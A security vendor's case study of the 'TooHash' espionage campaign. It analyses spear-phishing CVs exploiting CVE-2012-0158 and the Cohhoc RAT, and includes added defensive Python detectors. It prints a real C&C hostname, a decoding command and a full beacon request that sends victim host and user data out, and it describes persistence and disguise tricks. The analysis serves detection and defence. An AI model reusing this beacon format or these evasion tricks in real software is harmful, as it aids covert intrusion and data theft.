G DATA SecurityLabs Case Study


Contents

Executive Summary
    The Malware used
    Information Stealing
Campaign Analysis
    Targets
    Spear Phishing Campaign
    The Exploit used
    Tracking System
Malware Analysis 1: “Cohhoc”, the RAT
    Components
    Variants
    Persistence
    Features
    Obfuscation Layer
    Network Communication

Executive Summary

The experts of G DATA’s SecurityLabs discovered a cyber-espionage campaign that perfectly exemplifies how targeted attacks work. The purpose of this campaign was to steal valuable documents from the targeted entity. We have named this operation “TooHash”.

The attackers’ modus operandi is to carry out spear phishing using a malicious Microsoft Office document as an attachment. The attackers do not choose their targets indiscriminately, which we derive from the fact that they sent specially crafted CV documents, probably to human resources management employees. Naturally, such recipients are inclined to open documents of this kind on a daily basis.

The majority of discovered samples were submitted from Taiwan. Since some of the documents are in Simplified Chinese, which is used in mainland China, and others in Traditional Chinese, which is used in Hong Kong, Macao and Taiwan, these malicious documents might have been used against targets across the whole Greater China area.

The Malware used

The attached documents exploit a well-known and rather old vulnerability (CVE-2012-0158) to drop a remote administration tool, or RAT for short, onto the targeted user’s computer. During the campaign, we identified two different pieces of malware. Both include common cyber-espionage components such as code execution, file listing, document exfiltration and more.

We discovered more than 75 command and control servers, all used to administer infected machines. The servers were mainly located in Hong Kong and the USA. Furthermore, the administration panel used by the attackers to manage infected systems was written partly in Chinese and partly in English.

The exploit used by the attackers is identified and blocked by G DATA’s Exploit Protection technology and G DATA’s security solutions detect the dropped binaries as Win32.Trojan.Cohhoc.A and Win32.Trojan.DirectsX.A respectively.

Information Stealing

Nowadays, trade secrets are among the most valuable assets of almost every company. Therefore, envious competitors may be tempted to steal valuable sensitive information for their own purposes. The leak of sensitive documents can be a disaster for a company and lead to large financial losses. Furthermore, governmental entities handle sensitive, private or classified documents, and intelligence agencies may be interested in obtaining such documents.


Campaign Analysis

Targets

The analyzed samples used in the “TooHash” campaign were Microsoft Office documents, and were submitted to us by a Taiwanese customer.

One indication of the target area is one of the documents used by the attackers, which contained the string “102年尾牙、”, meaning “end of the year 102”. The official calendar used in Taiwan starts in 1912 (year 1), so the year 102 corresponds to the year 2013 in the Gregorian calendar (1911+102=2013).

We also conclude that the targets are entities located in the Greater China area from the name of another document used by the attackers, 李辉简历.doc, which translates to “resume of Li Hui”.

Another lead, suggesting that the attacks occurred in the Greater China area, is the fact that the majority of samples available on VirusTotal were originally submitted from Taiwan.

The DNS name of the C&C server contained information about affected companies. Here is a list of some targeted entities:

- Public research organization
- Space research organization
- Telecom companies
- Private companies

Spear Phishing Campaign

To drop the malware onto the targeted computer and to control the system, the attackers chose to carry out a spear phishing campaign. This campaign comprised a Microsoft Office document being sent to the victim. A probable entry point for a manipulated CV would be an HR department. If the document is opened with an outdated Microsoft Office version, malware is installed by exploiting vulnerability CVE-2012-0158.

To appear credible, the attackers selected the targeted users and the type of the attached documents cleverly. For example, a Microsoft Office Word document called resume of Li Hui.doc. The document title as well as the content was written in Simplified Chinese. The titles of the attacking documents involved are as follows:

- 文件列表.xls (file list) [Simplified Chinese]
- 李辉简历.doc (resume of Li Hui) [Simplified Chinese]
- 102年尾牙、103年春酒精緻菜單.xls (End of the year 102, year 103 Spring Menu) [Traditional Chinese]

The Exploit used

To explain the exploit used, we take a look at the Word document, the ostensible CV. The mentioned exploit causes Microsoft Word to crash, which might alert attacked users right away. In our case, the attackers crafted their malicious document in a special way to conceal the software crash: the malicious .doc causes a crash, but moments after the crash a legitimate Word session opens up and, to the user, everything appears to be normal.

Nevertheless, cautious users might suspect malicious actions behind such activities and notify security staff.

The CV that comes with the legitimate Word document (Wo.doc) is written in the Chinese characters and style used in mainland China. Nevertheless, this sample has also been submitted to us from Taiwan.


Screenshot 1: Screenshot of the legitimate document which opens after “resume of Li” exploited Word

Tracking System

The resume visible to the user (Wo.doc) holds a tracking mechanism: Li Hui’s picture, visible in the document as the blank square on the right hand side, is not stored locally but on the Internet. The following tag inside the document reveals this function:

MERGEFORMAT \d }

As soon as the document is loaded, a network query is performed and notifies the attacker about the successful exploit and the availability of a newly infected machine.
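The remote-picture tracking described above can be checked for on the defender's side. The following Python script is an added example, not code from the report: it inspects a .docx (OOXML) for INCLUDEPICTURE field codes that point at a URL and for image relationships marked external, the two places where Word keeps a linked rather than embedded picture. The sample document and the URL in it are constructed for the test; the report's own sample was a binary .doc, so the OOXML layout is an assumption of this example.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# INCLUDEPICTURE field with a URL; the "\d" switch (the remnant quoted above ends in
# "MERGEFORMAT \d") tells Word to link the picture instead of storing it in the file.
INCLUDEPICTURE_RE = re.compile(r'INCLUDEPICTURE\s+"?((?:https?|ftp)://[^"\s]+)', re.I)
W_NS = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

def find_remote_image_refs(docx_bytes):
    """Return the URLs a .docx would fetch for pictures when it is opened.

    Checks INCLUDEPICTURE field codes in word/document.xml (Word keeps field
    codes in instrText runs) and image relationships with TargetMode="External".
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        names = set(z.namelist())
        if "word/document.xml" in names:
            root = ET.fromstring(z.read("word/document.xml"))
            # A field code can be split over several runs, so join them first.
            instr = "".join(t.text or "" for t in root.iter(W_NS + "instrText"))
            hits += INCLUDEPICTURE_RE.findall(instr)
        rels = "word/_rels/document.xml.rels"
        if rels in names:
            for rel in ET.fromstring(z.read(rels)).iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") == "External" and rel.get("Type", "").endswith("/image"):
                    hits.append(rel.get("Target"))
    return sorted(set(hits))

def build_sample_docx(url):
    """Constructed minimal .docx with one linked picture (test data, not a real sample)."""
    document_xml = (
        '<w:document xmlns:w="%s"><w:body><w:p>'
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        '<w:r><w:instrText xml:space="preserve"> INCLUDEPICTURE "%s" </w:instrText></w:r>'
        '<w:r><w:instrText xml:space="preserve">\\* MERGEFORMAT \\d </w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p></w:body></w:document>'
        % (W_NS[1:-1], url)
    )
    rels_xml = (
        '<Relationships xmlns="%s"><Relationship Id="rId1" TargetMode="External" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" '
        'Target="%s"/></Relationships>' % (REL_NS[1:-1], url)
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml", document_xml)
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()

if __name__ == "__main__":
    sample = build_sample_docx("http://tracker.example.invalid/photo.jpg")
    print(find_remote_image_refs(sample))
```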

We identified two types of malware used to administer the infected machines: Cohhoc and DirectsX. The first one is a “classic” Remote Administration Tool. The second one is more advanced and of a different kind: it is a rootkit, executed in kernel mode.

The RAT and the rootkit both share the same command and control infrastructure.


Malware Analysis 1: “Cohhoc”, the RAT

Components

The malware is divided into three parts:

- Component 1: the dropper, used to install the second component into a specific directory and to execute it. This first file is removed after the execution of the second component;
- Component 2: a binary, used to unpack the third component and to execute it;
- Component 3: the payload; this is the real malicious part, the core of the malware.

The second component is installed into a subfolder of the directory %APPDATA% (for example in %APPDATA%\Microsoft\).

Known file names for the files used during the campaign discussed: svchost.exe and conime.exe.

The second component works as follows:

- It decrypts the payload. The payload is encrypted with AES. We identified different keys for different samples.
- It then loads the decrypted payload into memory. Once decrypted, the payload is a Windows dynamic-link library (.dll).
- It executes the loaded library.

In case you are interested in information regarding the unpacking of this malware, please feel free to contact us using toohash.securityblog@gdata.de.

Variants

During the TooHash campaign, we were able to identify two variants of “Cohhoc”. The two versions can be distinguished by looking at the creation of the respective mutex after the malware is started:

- H2_COMMON_DLL (before September 2013)
- NEW_H2_COMMON_DLL (after September 2013)

Screenshot 2: Mutex creation

The main difference between the two malware variants is the handling of the payload (component three). In the earlier version, the payload is located within a resource inside component two. In the later version, the payload is an additional file. This additional file is stored in the same directory as the second component and its name is brndlog.

As small as this difference seems to be for a normal computer user, from a malware analyst’s point of view, it is a huge difference. If, in the first case, the sample was found within a sample database, the analyst would be able to extract the payload and to analyze it right away. However, in the second case, the analyst cannot extract and analyze the payload at all. In this context, the second component alone is rather useless; one needs to find the binary which installs the payload. Furthermore, it is rather complex to create signature detection for an encrypted file, such as the payload discussed.

Persistence

Persistence is ensured by the creation of a shortcut file (.lnk) in the Start Menu folder. This shortcut is labeled as Internet Explorer .lnk. The blank space just before the file name extension was inserted to trick the user. The text looks exactly like the original without the additional space. Furthermore, it is not only the file’s name which misleads; the icon used for this link also comes in the disguise of Microsoft’s Internet Explorer. The screenshot below reveals that the actual file behind this shortcut points to a different program: conime.exe.

Screenshot 3: Shortcut, used to guarantee persistence

Features

The “Cohhoc” malware is a Remote Administration Tool and is able to:

- execute commands or scripts;
- download files;
- upload files;
- collect information about the infected system, for example hostname, username, version of the operating system, installed software;
- find specific documents in order to send them to the command and control servers.

Within the samples, we found two different hardcoded command and control servers and a feature to easily choose an alternative server. If the file %APPDATA%\Adobe\ActiveX.dat exists on the system, the malware uses the server listed in this file instead of the hardcoded servers. The content in the file must use the obfuscation system described in the next chapter.

This approach, using an extra file with server information, proves to be particularly useful for the attackers, as they do not have to transmit a new payload to the infected system. Furthermore, it keeps analysts in the dark about additional C&Cs in case they only see the .dat file. This file alone is rather useless. We have seen the same technique when looking at the differences between the two malware variants above.
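The host artefacts named in the Variants, Persistence and Features sections (the component two file names, the brndlog payload file, the Adobe\ActiveX.dat alternative C&C file and the padded shortcut name) can be swept for with one script. The following Python code is an added example and not the report's own tooling; the directory trees are passed in explicitly so the sweep can be pointed at a live profile or a mounted image, and the test tree it builds is constructed.

```python
import os
import tempfile

# Names taken from the case study; the directory layout below is constructed for the test.
COMPONENT_TWO_NAMES = ("svchost.exe", "conime.exe")  # component two, dropped under %APPDATA%
PAYLOAD_FILE = "brndlog"                               # external payload of the later variant
ALT_C2_FILE = os.path.join("Adobe", "ActiveX.dat")     # optional alternative C&C list

def sweep_cohhoc_artifacts(appdata, start_menu):
    """Return (indicator, path) pairs for Cohhoc-style artefacts under the two trees.

    appdata and start_menu are passed in explicitly (on a live host they would be
    %APPDATA% and the Start Menu folder) so the sweep also works on a mounted image.
    """
    findings = []
    alt = os.path.join(appdata, ALT_C2_FILE)
    if os.path.isfile(alt):
        findings.append(("alternative C&C file", alt))
    for root, _dirs, files in os.walk(appdata):
        by_lower = {f.lower(): f for f in files}
        # The genuine svchost.exe / conime.exe live in the system directory, never here.
        dropped = [by_lower[n] for n in COMPONENT_TWO_NAMES if n in by_lower]
        for f in dropped:
            findings.append(("component two under APPDATA", os.path.join(root, f)))
        if dropped and PAYLOAD_FILE in by_lower:
            findings.append(("encrypted payload beside component two",
                             os.path.join(root, by_lower[PAYLOAD_FILE])))
    for root, _dirs, files in os.walk(start_menu):
        for f in files:
            stem, ext = os.path.splitext(f)
            # "Internet Explorer .lnk": the blank before the extension is the disguise.
            if ext.lower() == ".lnk" and stem != stem.rstrip():
                findings.append(("shortcut with padded name", os.path.join(root, f)))
    return findings

def build_test_tree(base):
    """Constructed profile layout mimicking an infected machine (test data only)."""
    appdata = os.path.join(base, "AppData", "Roaming")
    start_menu = os.path.join(base, "Start Menu", "Programs")
    for sub in ("Microsoft", "Adobe"):
        os.makedirs(os.path.join(appdata, sub))
    os.makedirs(start_menu)
    for rel in (("Microsoft", "conime.exe"), ("Microsoft", "brndlog"), ("Adobe", "ActiveX.dat")):
        open(os.path.join(appdata, *rel), "wb").close()
    for name in ("Internet Explorer .lnk", "Notepad.lnk"):
        open(os.path.join(start_menu, name), "wb").close()
    return appdata, start_menu

def run_demo():
    """Build the test tree in a temporary directory and return the indicator names found."""
    with tempfile.TemporaryDirectory() as base:
        appdata, start_menu = build_test_tree(base)
        return [kind for kind, _path in sweep_cohhoc_artifacts(appdata, start_menu)]

if __name__ == "__main__":
    print(run_demo())
```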

Obfuscation Layer

The “Cohhoc” malware uses an obfuscation layer to disguise the malware and to complicate the analysis. The obfuscation is used:

- to encode the command and control addresses;
- to encode the data sent to the command and control servers (information and documents);
- to decode the data received from the command and control servers (the commands).

Screenshot 4: Algorithm used to encode the data

Screenshot 5: Algorithm used to decode the data

This algorithm can easily be reimplemented in C. Fellow researchers are welcome to receive the code after contacting samplerequest@gdata.de.

To keep the obfuscated binary data readable and easy to handle, it is base64-encoded into ASCII. Here is an example of decoding a command and control address:

paul@gdata:~$ echo 3d3duIWRvYmVzZXJ2aWNlbi5ldE= | base64 -d | ./obfuscation -d
www.adobeservice.net

Network Communication

The malware uses HTTP to communicate with the command and control servers. Here is an example of a request performed by an infected system:

GET /CgAAAAAAAABhAAAAYQAAAMjAxNCA1MiRgNzEzIDMzNAxhcHRvcExhYkAAAAAADGFwdG9wTGFiXHBhdWxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABdpbmRvd3NYUEAAADEwHHExHHEwAAAAAAo HTTP/1.1
X-MU-Session-ID: 765592219
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Host: www.adobeservice.net
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

The relevant data is placed in the path of the GET request. Here is the content of the request, decoded by using the code mentioned above:

paul@gdata:~$ cat CgAAAAAAAABhAAAAYQAAAMj[…] | base64 -d | ./common -d | cat -e
M-^B^@^@^@^@^@^@^@X^@^@^@X^@^@^@2014 52d 713 334LaptopLab^@^@^@^@^@LaptopLab\paul^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@WindowsXP^@^@^@10\11\10^@^@^@^@$

Here are the different parts of the data transmitted, in order of appearance:

- Green: the current date and time;
- Pink: the hostname of the infected machine;
- Blue: the domain and the username of the infected machine;
- Yellow: the version of the operating system;
- Red: a hardcoded string which means “end of message”.
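As an added example (not part of the report), the following Python code scores raw HTTP requests for the traits visible in the request above: a long unpadded base64 blob as the request path, the X-MU-Session-ID header, a Host on the report's C&C list, and the repeated 32-bit value that follows the 8-byte header in the decoded blob. That last check is a heuristic derived from this single sample, not a documented format; the beacon and benign requests it is run over are constructed.

```python
import base64
import re
import struct

KNOWN_C2_HOSTS = {"www.adobeservice.net"}                 # C&C host quoted in the report
B64_PATH_RE = re.compile(r"^/[A-Za-z0-9+/]{32,}={0,2}$")  # long base64 blob, no file name

def parse_request(raw):
    """Split a raw HTTP request (request line plus headers) into method, path, headers."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, headers

def decode_path_blob(path):
    """Base64-decode the path (the sample omits '=' padding); None if it is not base64."""
    s = path.lstrip("/")
    try:
        return base64.b64decode(s + "=" * (-len(s) % 4), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None

def score_cohhoc_beacon(raw):
    """Return (score, reasons) for one request; two or more reasons merit a look."""
    method, path, headers = parse_request(raw)
    reasons = []
    if method == "GET" and B64_PATH_RE.match(path):
        blob = decode_path_blob(path)
        if blob is not None:
            reasons.append("long base64 blob as request path")
            # In the report's sample the decoded blob carries an 8-byte header followed
            # by two identical 32-bit values; heuristic derived from that single sample.
            if len(blob) >= 16:
                first, second = struct.unpack_from("<II", blob, 8)
                if first and first == second:
                    reasons.append("repeated uint32 field after 8-byte header")
    if "x-mu-session-id" in headers:
        reasons.append("X-MU-Session-ID header")
    if headers.get("host", "").lower() in KNOWN_C2_HOSTS:
        reasons.append("Host is a known TooHash C&C")
    return len(reasons), reasons

def constructed_beacon(host):
    """Constructed request in the shape of the report's sample (not capture data)."""
    body = b"\x0a" + b"\x00" * 7 + struct.pack("<II", 0x61, 0x61) + b"2014 constructed body\x00" * 2
    path = base64.b64encode(body).decode().rstrip("=")
    return ("GET /%s HTTP/1.1\r\nX-MU-Session-ID: 765592219\r\n"
            "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"
            "Host: %s\r\nConnection: Keep-Alive\r\n" % (path, host))

# Constructed benign request for comparison.
BENIGN_REQUEST = "GET /images/logo.png HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\n"
```

On a proxy or IDS log, feed each reconstructed request to score_cohhoc_beacon and alert on a score of two or more.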
